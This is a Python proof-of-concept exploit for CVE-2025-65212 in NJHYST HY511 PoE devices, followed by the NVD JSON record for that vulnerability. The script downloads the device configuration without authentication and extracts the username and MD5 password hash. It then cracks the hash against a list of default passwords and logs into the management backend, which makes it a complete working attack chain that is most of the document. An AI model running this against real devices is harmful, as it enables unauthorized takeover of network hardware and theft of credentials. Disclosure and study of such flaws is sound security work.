CVE-2025-65212

import requests import hashlib import re # CVE-2025-65212 PoC - NJHYST HY511 POE Unauthenticated Config Download # Author: Security Researcher # Description: This PoC demonstrates the authentication bypass vulnerability # in NJHYST HY511 POE devices where configuration files can be downloaded # without proper session validation. TARGET_HOST = "http://target-device-ip" CONFIG_PATH = "/cgi-bin/cgi_config_download" # Common config download endpoint def exploit_unauthorized_access(): """ Step 1: Download configuration file without authentication The device does not validate session cookies for config file requests """ print("[+] Attempting to download configuration file...") # Direct request to config file - no authentication required url = f"{TARGET_HOST}{CONFIG_PATH}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "*/*" } try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print("[+] Configuration file downloaded successfully!") config_data = response.text # Step 2: Extract username and MD5 password from config username = re.search(r'username=(\w+)', config_data) md5_password = re.search(r'password=([a-f0-9]{32})', config_data) if username and md5_password: print(f"[+] Found username: {username.group(1)}") print(f"[+] Found MD5 password hash: {md5_password.group(1)}") # Step 3: Decrypt the MD5 password (simple MD5 crack) # Since the device uses weak self-decrypting MD5, try common passwords cracked_password = crack_md5_password(md5_password.group(1)) if cracked_password: print(f"[+] Cracked password: {cracked_password}") # Step 4: Login to the device backend login_and_access_backend(username.group(1), cracked_password) else: print(f"[-] Failed to download config. Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def crack_md5_password(md5_hash): """ Attempt to crack MD5 password using common/default passwords """ common_passwords = ['admin', 'password', '123456', 'admin123', 'root', 'default', '12345', 'admin@123', 'poe_admin', 'config'] for pwd in common_passwords: if hashlib.md5(pwd.encode()).hexdigest() == md5_hash: return pwd return None def login_and_access_backend(username, password): """ Step 4: Use obtained credentials to login to the management backend This demonstrates complete authentication bypass """ print(f"[+] Attempting to login with credentials: {username}/{password}") login_url = f"{TARGET_HOST}/cgi-bin/login" data = { "username": username, "password": password } try: response = requests.post(login_url, data=data, timeout=10, verify=False) if response.status_code == 200 and 'session' in response.cookies: print("[+] Successfully logged in to backend!") print("[+] Full device access obtained - Authentication Bypass Confirmed") return True except requests.exceptions.RequestException: pass print("[-] Login failed") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-65212 PoC - NJHYST HY511 POE Authentication Bypass") print("=" * 60) exploit_unauthorized_access()

{"cve": {"id": "CVE-2025-65212", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:51.670", "lastModified": "2026-01-29T01:31:03.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in NJHYST HY511 POE core before 2.1 and plugins before 0.1. The vulnerability stems from the device's insufficient cookie verification, allowing an attacker to directly request the configuration file address and download the core configuration file without logging into the device management backend. By reading the corresponding username and self-decrypted MD5 password in the core configuration file, the attacker can directly log in to the backend, thereby bypassing the front-end backend login page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-565"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:njhyst:hy511_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.1", "matchCriteriaId": "7B0D8BB1-8246-431D-B187-0C96DFBA87A3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:njhyst:hy511:-:*:*:*:*:*:*:*", "matchCriteriaId": "26D132E8-AC27-4F78-9DBF-1D91B4FC75D1"}]}]}], "references": [{"url": "https://gist.github.com/a2148001284/bcdda75fc8718454f16a7b9259463719", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/a2148001284/test1/blob/main/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9EEN.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}